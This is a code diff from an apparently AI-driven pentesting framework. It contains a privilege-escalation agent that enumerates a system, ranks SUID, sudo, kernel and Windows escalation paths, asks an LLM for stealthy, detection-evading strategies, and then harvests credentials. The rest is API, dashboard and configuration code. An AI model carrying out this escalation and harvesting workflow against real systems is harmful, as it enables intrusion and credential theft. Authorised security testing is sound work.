# Phase 1: System Enumeration
logger.info("Phase 1: System enumeration")
results["system_info"] = self._enumerate_system(exploit_data)
# Phase 2: Identify Escalation Paths
logger.info("Phase 2: Identifying escalation paths")
results["escalation_paths"] = self._identify_escalation_paths(
results["system_info"]
)
# Phase 3: AI-Powered Path Selection
logger.info("Phase 3: AI escalation strategy")
strategy = self._ai_escalation_strategy(
results["system_info"],
results["escalation_paths"]
)
results["ai_analysis"] = strategy
# Phase 4: Execute Escalation Attempts
logger.info("Phase 4: Executing escalation attempts")
for path in results["escalation_paths"][:5]:
escalation_result = self._attempt_escalation(path, results["system_info"])
if escalation_result.get("success"):
results["successful_escalations"].append(escalation_result)
logger.info(f"Successful escalation: {path.get('technique')}")
break # Stop after first successful escalation
# Phase 5: Credential Harvesting
if results["successful_escalations"]:
logger.info("Phase 5: Harvesting credentials")
results["credentials_harvested"] = self._harvest_credentials(
results["system_info"]
)
results["status"] = "completed"
logger.info("Privilege escalation phase completed")
except Exception as e:
logger.error(f"Error during privilege escalation: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _enumerate_system(self, exploit_data: Dict) -> Dict:
"""Enumerate system for privilege escalation opportunities"""
system_info = {
"os": "unknown",
"kernel_version": "unknown",
"architecture": "unknown",
"users": [],
"groups": [],
"sudo_permissions": [],
"suid_binaries": [],
"writable_paths": [],
"scheduled_tasks": [],
"services": [],
"environment_variables": {}
}
# Determine OS type from exploit data
os_type = self._detect_os_type(exploit_data)
system_info["os"] = os_type
if os_type == "linux":
system_info.update(self.linux_privesc.enumerate())
elif os_type == "windows":
system_info.update(self.windows_privesc.enumerate())
return system_info
def _detect_os_type(self, exploit_data: Dict) -> str:
"""Detect operating system type"""
# Placeholder - would analyze exploit data to determine OS
return "linux" # Default assumption
def _identify_escalation_paths(self, system_info: Dict) -> List[Dict]:
"""Identify possible privilege escalation paths"""
paths = []
os_type = system_info.get("os")
if os_type == "linux":
# SUID exploitation
for binary in system_info.get("suid_binaries", []):
paths.append({
"technique": "suid_exploitation",
"target": binary,
"difficulty": "medium",
"likelihood": 0.6
})
# Sudo exploitation
for permission in system_info.get("sudo_permissions", []):
paths.append({
"technique": "sudo_exploitation",
"target": permission,
"difficulty": "low",
"likelihood": 0.8
})
# Kernel exploitation
if system_info.get("kernel_version"):
paths.append({
"technique": "kernel_exploit",
"target": system_info["kernel_version"],
"difficulty": "high",
"likelihood": 0.4
})
# Writable path exploitation
for path in system_info.get("writable_paths", []):
if "bin" in path or "sbin" in path:
paths.append({
"technique": "path_hijacking",
"target": path,
"difficulty": "medium",
"likelihood": 0.5
})
elif os_type == "windows":
# Service exploitation
for service in system_info.get("services", []):
if service.get("unquoted_path") or service.get("weak_permissions"):
paths.append({
"technique": "service_exploitation",
"target": service,
"difficulty": "medium",
"likelihood": 0.7
})
# AlwaysInstallElevated
if system_info.get("always_install_elevated"):
paths.append({
"technique": "always_install_elevated",
"target": "MSI",
"difficulty": "low",
"likelihood": 0.9
})
# Token impersonation
paths.append({
"technique": "token_impersonation",
"target": "SeImpersonatePrivilege",
"difficulty": "medium",
"likelihood": 0.6
})
# Sort by likelihood
paths.sort(key=lambda x: x.get("likelihood", 0), reverse=True)
return paths
def _ai_escalation_strategy(self, system_info: Dict, escalation_paths: List[Dict]) -> Dict:
"""Use AI to optimize escalation strategy"""
prompt = self.llm.get_prompt(
"privesc",
"ai_escalation_strategy_user",
default=f"""
Analyze the system and recommend optimal privilege escalation strategy:
System Information:
{json.dumps(system_info, indent=2)}
Identified Escalation Paths:
{json.dumps(escalation_paths, indent=2)}
Provide:
1. Recommended escalation path (with justification)
2. Step-by-step execution plan
3. Required tools and commands
4. Detection likelihood and evasion techniques
5. Fallback options
6. Post-escalation actions
Response in JSON format with actionable recommendations.
"""
)
system_prompt = self.llm.get_prompt(
"privesc",
"ai_escalation_strategy_system",
default="""You are an expert in privilege escalation techniques.
Analyze systems and recommend the most effective, stealthy escalation paths.
Consider Windows, Linux, and Active Directory environments.
Prioritize reliability and minimal detection."""
)
try:
formatted_prompt = prompt.format(
system_info_json=json.dumps(system_info, indent=2),
escalation_paths_json=json.dumps(escalation_paths, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI escalation strategy error: {e}")
return {"error": str(e)}
def _attempt_escalation(self, path: Dict, system_info: Dict) -> Dict:
"""Attempt privilege escalation using specified path"""
technique = path.get("technique")
os_type = system_info.get("os")
result = {
"technique": technique,
"success": False,
"details": {}
}
try:
if os_type == "linux":
if technique == "suid_exploitation":
result = self.linux_privesc.exploit_suid(path.get("target"))
elif technique == "sudo_exploitation":
result = self.sudo_exploiter.exploit(path.get("target"))
elif technique == "kernel_exploit":
result = self.kernel_exploiter.exploit_linux(path.get("target"))
elif technique == "path_hijacking":
result = self.linux_privesc.exploit_path_hijacking(path.get("target"))
elif os_type == "windows":
if technique == "service_exploitation":
result = self.windows_privesc.exploit_service(path.get("target"))
elif technique == "always_install_elevated":
result = self.windows_privesc.exploit_msi()
elif technique == "token_impersonation":
result = self.windows_privesc.impersonate_token()
except Exception as e:
logger.error(f"Escalation error for {technique}: {e}")
result["error"] = str(e)
return result
def _harvest_credentials(self, system_info: Dict) -> List[Dict]:
"""Harvest credentials after privilege escalation"""
os_type = system_info.get("os")
if os_type == "linux":
return self.cred_harvester.harvest_linux()
elif os_type == "windows":
return self.cred_harvester.harvest_windows()
return []
-120
View File
@@ -1,120 +0,0 @@
#!/usr/bin/env python3
"""
Web Pentest Agent - Specialized agent for web application penetration testing.
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.web_pentest import WebRecon # Import the moved WebRecon tool
logger = logging.getLogger(__name__)
class WebPentestAgent:
"""Agent responsible for comprehensive web application penetration testing."""
def __init__(self, config: Dict):
"""Initializes the WebPentestAgent."""
self.config = config
self.llm = LLMManager(config)
self.web_recon = WebRecon(config)
# Placeholder for web exploitation tools if they become separate classes
# self.web_exploiter = WebExploiter(config)
logger.info("WebPentestAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Executes the web application penetration testing phase."""
logger.info(f"Starting web pentest on {target}")
results = {
"target": target,
"status": "running",
"web_recon_results": {},
"vulnerability_analysis": [],
"exploitation_attempts": [],
"ai_analysis": {}
}
try:
# Phase 1: Web Reconnaissance
logger.info("Phase 1: Web Reconnaissance (WebPentestAgent)")
web_recon_output = self.web_recon.analyze(target)
results["web_recon_results"] = web_recon_output
# Phase 2: Vulnerability Analysis (AI-powered)
logger.info("Phase 2: AI-powered Vulnerability Analysis")
# This part will be improved later with more detailed vulnerability detection in WebRecon
# For now, it will look for findings reported by WebRecon
potential_vulnerabilities = self._identify_potential_web_vulnerabilities(web_recon_output)
if potential_vulnerabilities:
results["vulnerability_analysis"] = potential_vulnerabilities
ai_vulnerability_analysis = self._ai_analyze_web_vulnerabilities(potential_vulnerabilities, target)
results["ai_analysis"]["vulnerability_insights"] = ai_vulnerability_analysis
else:
logger.info("No immediate web vulnerabilities identified by WebRecon.")
# Phase 3: Web Exploitation (Placeholder for now)
# This will integrate with exploitation tools later.
results["status"] = "completed"
logger.info("Web pentest phase completed")
except Exception as e:
logger.error(f"Error during web pentest: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _identify_potential_web_vulnerabilities(self, web_recon_output: Dict) -> List[Dict]:
"""
Identifies potential web vulnerabilities based on WebRecon output.
This is a placeholder and will be enhanced as WebRecon improves.
"""
vulnerabilities = []
if "vulnerabilities" in web_recon_output:
vulnerabilities.extend(web_recon_output["vulnerabilities"])
return vulnerabilities
def _ai_analyze_web_vulnerabilities(self, vulnerabilities: List[Dict], target: str) -> Dict:
"""Uses AI to analyze identified web vulnerabilities."""
prompt = self.llm.get_prompt(
"web_recon",
"ai_analysis_user",
default=f"""
Analyze the following potential web vulnerabilities identified on {target} and provide insights:
Vulnerabilities: {json.dumps(vulnerabilities, indent=2)}
Provide:
1. Prioritized list of vulnerabilities
2. Recommended exploitation steps for each (if applicable)
3. Potential impact
4. Remediation suggestions
Response in JSON format with actionable recommendations.
"""
)
system_prompt = self.llm.get_prompt(
"web_recon",
"ai_analysis_system",
default="""You are an expert web penetration tester and security analyst.
Provide precise analysis of web vulnerabilities and practical advice for exploitation and remediation."""
)
try:
# Format the user prompt with recon_data
formatted_prompt = prompt.format(
target=target,
vulnerabilities_json=json.dumps(vulnerabilities, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI web vulnerability analysis error: {e}")
return {"error": str(e), "raw_response": response if 'response' in locals() else None}
-1
View File
@@ -1 +0,0 @@
# API package
@@ -1 +0,0 @@
# API v1 package
File diff suppressed because it is too large Load Diff
@@ -1,176 +0,0 @@
"""
NeuroSploit v3 - Agent Tasks API Endpoints
"""
from typing import Optional
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select, func
from backend.db.database import get_db
from backend.models import AgentTask, Scan
from backend.schemas.agent_task import (
AgentTaskResponse,
AgentTaskListResponse,
AgentTaskSummary
)
router = APIRouter()
@router.get("", response_model=AgentTaskListResponse)
async def list_agent_tasks(
scan_id: str,
status: Optional[str] = None,
task_type: Optional[str] = None,
page: int = 1,
per_page: int = 50,
db: AsyncSession = Depends(get_db)
):
"""List all agent tasks for a scan"""
# Verify scan exists
scan_result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
# Build query
query = select(AgentTask).where(AgentTask.scan_id == scan_id)
if status:
query = query.where(AgentTask.status == status)
if task_type:
query = query.where(AgentTask.task_type == task_type)
query = query.order_by(AgentTask.created_at.desc())
# Get total count
count_query = select(func.count()).select_from(AgentTask).where(AgentTask.scan_id == scan_id)
if status:
count_query = count_query.where(AgentTask.status == status)
if task_type:
count_query = count_query.where(AgentTask.task_type == task_type)
total_result = await db.execute(count_query)
total = total_result.scalar() or 0
# Apply pagination
query = query.offset((page - 1) * per_page).limit(per_page)
result = await db.execute(query)
tasks = result.scalars().all()
return AgentTaskListResponse(
tasks=[AgentTaskResponse(**t.to_dict()) for t in tasks],
total=total,
scan_id=scan_id
)
@router.get("/summary", response_model=AgentTaskSummary)
async def get_agent_tasks_summary(
scan_id: str,
db: AsyncSession = Depends(get_db)
):
"""Get summary statistics for agent tasks in a scan"""
# Verify scan exists
scan_result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
# Total count
total_result = await db.execute(
select(func.count()).select_from(AgentTask).where(AgentTask.scan_id == scan_id)
)
total = total_result.scalar() or 0
# Count by status
status_counts = {}
for status in ["pending", "running", "completed", "failed"]:
count_result = await db.execute(
select(func.count()).select_from(AgentTask)
.where(AgentTask.scan_id == scan_id)
.where(AgentTask.status == status)
)
status_counts[status] = count_result.scalar() or 0
# Count by task type
type_query = select(
AgentTask.task_type,
func.count(AgentTask.id).label("count")
).where(AgentTask.scan_id == scan_id).group_by(AgentTask.task_type)
type_result = await db.execute(type_query)
by_type = {row[0]: row[1] for row in type_result.all()}
# Count by tool
tool_query = select(
AgentTask.tool_name,
func.count(AgentTask.id).label("count")
).where(AgentTask.scan_id == scan_id).where(AgentTask.tool_name.isnot(None)).group_by(AgentTask.tool_name)
tool_result = await db.execute(tool_query)
by_tool = {row[0]: row[1] for row in tool_result.all()}
return AgentTaskSummary(
total=total,
pending=status_counts.get("pending", 0),
running=status_counts.get("running", 0),
completed=status_counts.get("completed", 0),
failed=status_counts.get("failed", 0),
by_type=by_type,
by_tool=by_tool
)
@router.get("/{task_id}", response_model=AgentTaskResponse)
async def get_agent_task(
task_id: str,
db: AsyncSession = Depends(get_db)
):
"""Get a specific agent task by ID"""
result = await db.execute(select(AgentTask).where(AgentTask.id == task_id))
task = result.scalar_one_or_none()
if not task:
raise HTTPException(status_code=404, detail="Agent task not found")
return AgentTaskResponse(**task.to_dict())
@router.get("/scan/{scan_id}/timeline")
async def get_agent_tasks_timeline(
scan_id: str,
db: AsyncSession = Depends(get_db)
):
"""Get agent tasks as a timeline for visualization"""
# Verify scan exists
scan_result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
# Get all tasks ordered by creation time
query = select(AgentTask).where(AgentTask.scan_id == scan_id).order_by(AgentTask.created_at.asc())
result = await db.execute(query)
tasks = result.scalars().all()
timeline = []
for task in tasks:
timeline_item = {
"id": task.id,
"task_name": task.task_name,
"task_type": task.task_type,
"tool_name": task.tool_name,
"status": task.status,
"started_at": task.started_at.isoformat() if task.started_at else None,
"completed_at": task.completed_at.isoformat() if task.completed_at else None,
"duration_ms": task.duration_ms,
"items_processed": task.items_processed,
"items_found": task.items_found,
"result_summary": task.result_summary,
"error_message": task.error_message
}
timeline.append(timeline_item)
return {
"scan_id": scan_id,
"timeline": timeline,
"total": len(timeline)
}
-144
View File
@@ -1,144 +0,0 @@
"""
CLI Agent API - Endpoints for CLI agent provider detection and methodology listing.
"""
import os
import glob
import logging
from typing import List, Dict, Optional
from fastapi import APIRouter
logger = logging.getLogger(__name__)
router = APIRouter(prefix="/api/v1/cli-agent", tags=["CLI Agent"])
# CLI providers that can run as autonomous agents
CLI_AGENT_PROVIDER_IDS = ["claude_code", "gemini_cli", "codex_cli"]
@router.get("/providers")
async def get_cli_providers() -> Dict:
"""List available CLI agent providers with connection status from SmartRouter."""
providers = []
try:
from backend.core.smart_router import get_registry
registry = get_registry()
except Exception:
registry = None
for pid in CLI_AGENT_PROVIDER_IDS:
provider_info = {
"id": pid,
"name": pid,
"connected": False,
"account_label": None,
"source": None,
}
if registry:
provider = registry.get_provider(pid)
if provider:
provider_info["name"] = provider.name
accounts = registry.get_active_accounts(pid)
if accounts:
provider_info["connected"] = True
provider_info["account_label"] = accounts[0].label
provider_info["source"] = accounts[0].source
providers.append(provider_info)
# Also check env var API keys as fallback
env_fallbacks = {
"claude_code": "ANTHROPIC_API_KEY",
"gemini_cli": "GEMINI_API_KEY",
"codex_cli": "OPENAI_API_KEY",
}
for p in providers:
if not p["connected"]:
env_key = env_fallbacks.get(p["id"], "")
if env_key and os.getenv(env_key, ""):
p["connected"] = True
p["source"] = "env_var"
p["account_label"] = f"${env_key}"
enabled = os.getenv("ENABLE_CLI_AGENT", "false").lower() == "true"
return {
"enabled": enabled,
"providers": providers,
"connected_count": sum(1 for p in providers if p["connected"]),
}
@router.get("/methodologies")
async def list_methodologies() -> Dict:
"""List available methodology .md files for CLI agent."""
methodologies: List[Dict] = []
seen_paths: set = set()
# 1. Check METHODOLOGY_FILE env var (default)
default_path = os.getenv("METHODOLOGY_FILE", "")
if default_path and os.path.exists(default_path):
size = os.path.getsize(default_path)
methodologies.append({
"name": os.path.basename(default_path),
"path": default_path,
"size": size,
"size_human": _human_size(size),
"is_default": True,
})
seen_paths.add(os.path.abspath(default_path))
# 2. Scan /opt/Prompts-PenTest/ for .md files
prompts_dir = "/opt/Prompts-PenTest"
if os.path.isdir(prompts_dir):
for md_file in sorted(glob.glob(os.path.join(prompts_dir, "*.md"))):
abs_path = os.path.abspath(md_file)
if abs_path in seen_paths:
continue
seen_paths.add(abs_path)
name = os.path.basename(md_file)
size = os.path.getsize(md_file)
# Only include pentest-related files (skip research reports, etc.)
name_lower = name.lower()
if any(kw in name_lower for kw in ["pentest", "prompt", "bugbounty", "methodology", "chunk"]):
methodologies.append({
"name": name,
"path": md_file,
"size": size,
"size_human": _human_size(size),
"is_default": False,
})
# 3. Check data/ directory
data_dir = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), "data")
if os.path.isdir(data_dir):
for md_file in glob.glob(os.path.join(data_dir, "*methodology*.md")):
abs_path = os.path.abspath(md_file)
if abs_path not in seen_paths:
seen_paths.add(abs_path)
size = os.path.getsize(md_file)
methodologies.append({
"name": os.path.basename(md_file),
"path": md_file,
"size": size,
"size_human": _human_size(size),
"is_default": False,
})
return {
"methodologies": methodologies,
"total": len(methodologies),
}
def _human_size(size_bytes: int) -> str:
"""Convert bytes to human-readable size."""
if size_bytes < 1024:
return f"{size_bytes} B"
elif size_bytes < 1024 * 1024:
return f"{size_bytes / 1024:.1f} KB"
else:
return f"{size_bytes / (1024 * 1024):.1f} MB"
-299
View File
@@ -1,299 +0,0 @@
"""
NeuroSploit v3 - Dashboard API Endpoints
"""
from typing import List
from fastapi import APIRouter, Depends
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select, func
from datetime import datetime, timedelta
from backend.db.database import get_db
from backend.models import Scan, Vulnerability, Endpoint, AgentTask, Report
router = APIRouter()
@router.get("/stats")
async def get_dashboard_stats(db: AsyncSession = Depends(get_db)):
"""Get overall dashboard statistics"""
# Total scans
total_scans_result = await db.execute(select(func.count()).select_from(Scan))
total_scans = total_scans_result.scalar() or 0
# Scans by status
running_result = await db.execute(
select(func.count()).select_from(Scan).where(Scan.status == "running")
)
running_scans = running_result.scalar() or 0
completed_result = await db.execute(
select(func.count()).select_from(Scan).where(Scan.status == "completed")
)
completed_scans = completed_result.scalar() or 0
stopped_result = await db.execute(
select(func.count()).select_from(Scan).where(Scan.status == "stopped")
)
stopped_scans = stopped_result.scalar() or 0
failed_result = await db.execute(
select(func.count()).select_from(Scan).where(Scan.status == "failed")
)
failed_scans = failed_result.scalar() or 0
pending_result = await db.execute(
select(func.count()).select_from(Scan).where(Scan.status == "pending")
)
pending_scans = pending_result.scalar() or 0
# Total vulnerabilities by severity
vuln_counts = {}
for severity in ["critical", "high", "medium", "low", "info"]:
result = await db.execute(
select(func.count()).select_from(Vulnerability).where(Vulnerability.severity == severity)
)
vuln_counts[severity] = result.scalar() or 0
total_vulns = sum(vuln_counts.values())
# Total endpoints
endpoints_result = await db.execute(select(func.count()).select_from(Endpoint))
total_endpoints = endpoints_result.scalar() or 0
# Recent activity (last 7 days)
week_ago = datetime.utcnow() - timedelta(days=7)
recent_scans_result = await db.execute(
select(func.count()).select_from(Scan).where(Scan.created_at >= week_ago)
)
recent_scans = recent_scans_result.scalar() or 0
recent_vulns_result = await db.execute(
select(func.count()).select_from(Vulnerability).where(Vulnerability.created_at >= week_ago)
)
recent_vulns = recent_vulns_result.scalar() or 0
return {
"scans": {
"total": total_scans,
"running": running_scans,
"completed": completed_scans,
"stopped": stopped_scans,
"failed": failed_scans,
"pending": pending_scans,
"recent": recent_scans
},
"vulnerabilities": {
"total": total_vulns,
"critical": vuln_counts["critical"],
"high": vuln_counts["high"],
"medium": vuln_counts["medium"],
"low": vuln_counts["low"],
"info": vuln_counts["info"],
"recent": recent_vulns
},
"endpoints": {
"total": total_endpoints
}
}
@router.get("/recent")
async def get_recent_activity(
limit: int = 10,
db: AsyncSession = Depends(get_db)
):
"""Get recent scan activity"""
# Recent scans
scans_query = select(Scan).order_by(Scan.created_at.desc()).limit(limit)
scans_result = await db.execute(scans_query)
recent_scans = scans_result.scalars().all()
# Recent vulnerabilities
vulns_query = select(Vulnerability).order_by(Vulnerability.created_at.desc()).limit(limit)
vulns_result = await db.execute(vulns_query)
recent_vulns = vulns_result.scalars().all()
return {
"recent_scans": [s.to_dict() for s in recent_scans],
"recent_vulnerabilities": [v.to_dict() for v in recent_vulns]
}
@router.get("/findings")
async def get_recent_findings(
limit: int = 20,
severity: str = None,
db: AsyncSession = Depends(get_db)
):
"""Get recent vulnerability findings"""
query = select(Vulnerability).order_by(Vulnerability.created_at.desc())
if severity:
query = query.where(Vulnerability.severity == severity)
query = query.limit(limit)
result = await db.execute(query)
vulnerabilities = result.scalars().all()
return {
"findings": [v.to_dict() for v in vulnerabilities],
"total": len(vulnerabilities)
}
@router.get("/vulnerability-types")
async def get_vulnerability_distribution(db: AsyncSession = Depends(get_db)):
"""Get vulnerability distribution by type"""
query = select(
Vulnerability.vulnerability_type,
func.count(Vulnerability.id).label("count")
).group_by(Vulnerability.vulnerability_type)
result = await db.execute(query)
distribution = result.all()
return {
"distribution": [
{"type": row[0], "count": row[1]}
for row in distribution
]
}
@router.get("/scan-history")
async def get_scan_history(
days: int = 30,
db: AsyncSession = Depends(get_db)
):
"""Get scan history for charts"""
start_date = datetime.utcnow() - timedelta(days=days)
# Get scans grouped by date
scans = await db.execute(
select(Scan).where(Scan.created_at >= start_date).order_by(Scan.created_at)
)
all_scans = scans.scalars().all()
# Group by date
history = {}
for scan in all_scans:
date_str = scan.created_at.strftime("%Y-%m-%d")
if date_str not in history:
history[date_str] = {
"date": date_str,
"scans": 0,
"vulnerabilities": 0,
"critical": 0,
"high": 0
}
history[date_str]["scans"] += 1
history[date_str]["vulnerabilities"] += scan.total_vulnerabilities
history[date_str]["critical"] += scan.critical_count
history[date_str]["high"] += scan.high_count
return {"history": list(history.values())}
@router.get("/agent-tasks")
async def get_recent_agent_tasks(
limit: int = 20,
db: AsyncSession = Depends(get_db)
):
"""Get recent agent tasks across all scans"""
query = (
select(AgentTask)
.order_by(AgentTask.created_at.desc())
.limit(limit)
)
result = await db.execute(query)
tasks = result.scalars().all()
return {
"agent_tasks": [t.to_dict() for t in tasks],
"total": len(tasks)
}
@router.get("/activity-feed")
async def get_activity_feed(
limit: int = 30,
db: AsyncSession = Depends(get_db)
):
"""Get unified activity feed with all recent events"""
activities = []
# Get recent scans
scans_result = await db.execute(
select(Scan).order_by(Scan.created_at.desc()).limit(limit // 3)
)
for scan in scans_result.scalars().all():
activities.append({
"type": "scan",
"action": f"Scan {scan.status}",
"title": scan.name or "Unnamed Scan",
"description": f"{scan.total_vulnerabilities} vulnerabilities found",
"status": scan.status,
"severity": None,
"timestamp": scan.created_at.isoformat(),
"scan_id": scan.id,
"link": f"/scan/{scan.id}"
})
# Get recent vulnerabilities
vulns_result = await db.execute(
select(Vulnerability).order_by(Vulnerability.created_at.desc()).limit(limit // 3)
)
for vuln in vulns_result.scalars().all():
activities.append({
"type": "vulnerability",
"action": "Vulnerability found",
"title": vuln.title,
"description": vuln.affected_endpoint or "",
"status": None,
"severity": vuln.severity,
"timestamp": vuln.created_at.isoformat(),
"scan_id": vuln.scan_id,
"link": f"/scan/{vuln.scan_id}"
})
# Get recent agent tasks
tasks_result = await db.execute(
select(AgentTask).order_by(AgentTask.created_at.desc()).limit(limit // 3)
)
for task in tasks_result.scalars().all():
activities.append({
"type": "agent_task",
"action": f"Task {task.status}",
"title": task.task_name,
"description": task.result_summary or task.description or "",
"status": task.status,
"severity": None,
"timestamp": task.created_at.isoformat(),
"scan_id": task.scan_id,
"link": f"/scan/{task.scan_id}"
})
# Get recent reports
reports_result = await db.execute(
select(Report).order_by(Report.generated_at.desc()).limit(limit // 4)
)
for report in reports_result.scalars().all():
activities.append({
"type": "report",
"action": "Report generated" if report.auto_generated else "Report created",
"title": report.title or "Report",
"description": f"{report.format.upper()} format",
"status": "auto" if report.auto_generated else "manual",
"severity": None,
"timestamp": report.generated_at.isoformat(),
"scan_id": report.scan_id,
"link": f"/reports"
})
# Sort all activities by timestamp (newest first)
activities.sort(key=lambda x: x["timestamp"], reverse=True)
return {
"activities": activities[:limit],
"total": len(activities)
}
-38
View File
@@ -1,38 +0,0 @@
"""
NeuroSploit v3 - FULL AI Testing API
Serves the comprehensive pentest prompt and manages FULL AI testing sessions.
"""
import logging
from pathlib import Path
from fastapi import APIRouter, HTTPException
logger = logging.getLogger(__name__)
router = APIRouter()
# Default prompt file path - English translation preferred, fallback to original
PROMPT_PATH_EN = Path("/opt/Prompts-PenTest/pentestcompleto_en.md")
PROMPT_PATH_PT = Path("/opt/Prompts-PenTest/pentestcompleto.md")
PROMPT_PATH = PROMPT_PATH_EN if PROMPT_PATH_EN.exists() else PROMPT_PATH_PT
@router.get("/prompt")
async def get_full_ia_prompt():
"""Return the comprehensive pentest prompt content."""
if not PROMPT_PATH.exists():
raise HTTPException(
status_code=404,
detail=f"Pentest prompt file not found at {PROMPT_PATH}"
)
try:
content = PROMPT_PATH.read_text(encoding="utf-8")
return {
"content": content,
"path": str(PROMPT_PATH),
"size": len(content),
"lines": content.count("\n") + 1,
}
except Exception as e:
logger.error(f"Failed to read prompt file: {e}")
raise HTTPException(status_code=500, detail=str(e))
-172
View File
@@ -1,172 +0,0 @@
"""
NeuroSploit v3 - Knowledge Management API
Upload, manage, and query custom security knowledge documents.
"""
import os
from typing import Optional, List
from fastapi import APIRouter, HTTPException, UploadFile, File, Query
from pydantic import BaseModel
router = APIRouter()
# Lazy-loaded processor instance
_processor = None
def _get_processor():
global _processor
if _processor is None:
from backend.core.knowledge_processor import KnowledgeProcessor
# Try to get LLM client for AI analysis
llm = None
try:
from backend.core.autonomous_agent import LLMClient
client = LLMClient()
if client.is_available():
llm = client
except Exception:
pass
_processor = KnowledgeProcessor(llm_client=llm)
return _processor
# --- Schemas ---
class KnowledgeDocumentResponse(BaseModel):
id: str
filename: str
title: str
source_type: str
uploaded_at: str
processed: bool
file_size_bytes: int
summary: str
vuln_types: List[str]
entries_count: int
class KnowledgeEntryResponse(BaseModel):
vuln_type: str
methodology: str = ""
payloads: List[str] = []
key_insights: str = ""
bypass_techniques: List[str] = []
source_document: str = ""
class KnowledgeStatsResponse(BaseModel):
total_documents: int
total_entries: int
vuln_types_covered: List[str]
storage_bytes: int
# --- Endpoints ---
@router.post("/upload", response_model=KnowledgeDocumentResponse)
async def upload_knowledge(file: UploadFile = File(...)):
"""Upload a security document for knowledge extraction.
Supported formats: PDF, Markdown (.md), Text (.txt), HTML
The document will be analyzed and indexed by vulnerability type.
"""
if not file.filename:
raise HTTPException(400, "Filename is required")
# Read file content
content = await file.read()
if len(content) > 50 * 1024 * 1024: # 50MB limit
raise HTTPException(413, "File too large (max 50MB)")
if len(content) == 0:
raise HTTPException(400, "Empty file")
processor = _get_processor()
try:
doc = await processor.process_upload(content, file.filename)
except ValueError as e:
raise HTTPException(400, str(e))
except Exception as e:
raise HTTPException(500, f"Processing failed: {str(e)}")
return KnowledgeDocumentResponse(
id=doc["id"],
filename=doc["filename"],
title=doc["title"],
source_type=doc["source_type"],
uploaded_at=doc["uploaded_at"],
processed=doc["processed"],
file_size_bytes=doc["file_size_bytes"],
summary=doc["summary"],
vuln_types=doc["vuln_types"],
entries_count=len(doc.get("knowledge_entries", [])),
)
@router.get("/documents", response_model=List[KnowledgeDocumentResponse])
async def list_documents():
"""List all indexed knowledge documents."""
processor = _get_processor()
docs = processor.get_documents()
return [
KnowledgeDocumentResponse(
id=d["id"],
filename=d["filename"],
title=d["title"],
source_type=d["source_type"],
uploaded_at=d["uploaded_at"],
processed=d["processed"],
file_size_bytes=d["file_size_bytes"],
summary=d["summary"],
vuln_types=d["vuln_types"],
entries_count=d["entries_count"],
)
for d in docs
]
@router.get("/documents/{doc_id}")
async def get_document(doc_id: str):
"""Get a specific document with its full knowledge entries."""
processor = _get_processor()
doc = processor.get_document(doc_id)
if not doc:
raise HTTPException(404, f"Document '{doc_id}' not found")
return doc
@router.delete("/documents/{doc_id}")
async def delete_document(doc_id: str):
"""Delete a knowledge document and its index entries."""
processor = _get_processor()
deleted = processor.delete_document(doc_id)
if not deleted:
raise HTTPException(404, f"Document '{doc_id}' not found")
return {"message": f"Document '{doc_id}' deleted", "id": doc_id}
@router.get("/search", response_model=List[KnowledgeEntryResponse])
async def search_knowledge(vuln_type: str = Query(..., description="Vulnerability type to search")):
"""Search knowledge entries by vulnerability type."""
processor = _get_processor()
entries = processor.search_by_vuln_type(vuln_type)
return [
KnowledgeEntryResponse(
vuln_type=e.get("vuln_type", ""),
methodology=e.get("methodology", ""),
payloads=e.get("payloads", []),
key_insights=e.get("key_insights", ""),
bypass_techniques=e.get("bypass_techniques", []),
source_document=e.get("source_document", ""),
)
for e in entries
]
@router.get("/stats", response_model=KnowledgeStatsResponse)
async def get_stats():
"""Get knowledge base statistics."""
processor = _get_processor()
stats = processor.get_stats()
return KnowledgeStatsResponse(**stats)
-320
View File
@@ -1,320 +0,0 @@
"""
NeuroSploit v3 - MCP Server Management API
CRUD for Model Context Protocol server connections.
Persists to config/config.json mcp_servers section.
"""
import json
import asyncio
from pathlib import Path
from typing import Optional, List, Dict
from fastapi import APIRouter, HTTPException
from pydantic import BaseModel, Field
router = APIRouter()
CONFIG_PATH = Path(__file__).parent.parent.parent.parent / "config" / "config.json"
BUILTIN_SERVER = "neurosploit_tools"
# --- Schemas ---
class MCPServerCreate(BaseModel):
name: str = Field(..., min_length=1, max_length=100, description="Unique server identifier")
transport: str = Field("stdio", description="Transport type: stdio or sse")
command: Optional[str] = Field(None, description="Command for stdio transport")
args: Optional[List[str]] = Field(None, description="Args for stdio transport")
url: Optional[str] = Field(None, description="URL for sse transport")
env: Optional[Dict[str, str]] = Field(None, description="Environment variables")
description: str = Field("", description="Server description")
enabled: bool = Field(True, description="Whether server is enabled")
class MCPServerUpdate(BaseModel):
transport: Optional[str] = None
command: Optional[str] = None
args: Optional[List[str]] = None
url: Optional[str] = None
env: Optional[Dict[str, str]] = None
description: Optional[str] = None
enabled: Optional[bool] = None
class MCPServerResponse(BaseModel):
name: str
transport: str
command: Optional[str] = None
args: Optional[List[str]] = None
url: Optional[str] = None
env: Optional[Dict[str, str]] = None
description: str = ""
enabled: bool = True
is_builtin: bool = False
class MCPToolResponse(BaseModel):
name: str
description: str
server_name: str
# --- Config helpers ---
def _read_config() -> dict:
if not CONFIG_PATH.exists():
return {}
with open(CONFIG_PATH) as f:
return json.load(f)
def _write_config(config: dict):
with open(CONFIG_PATH, "w") as f:
json.dump(config, f, indent=4)
def _get_mcp_servers(config: dict) -> dict:
return config.get("mcp_servers", {})
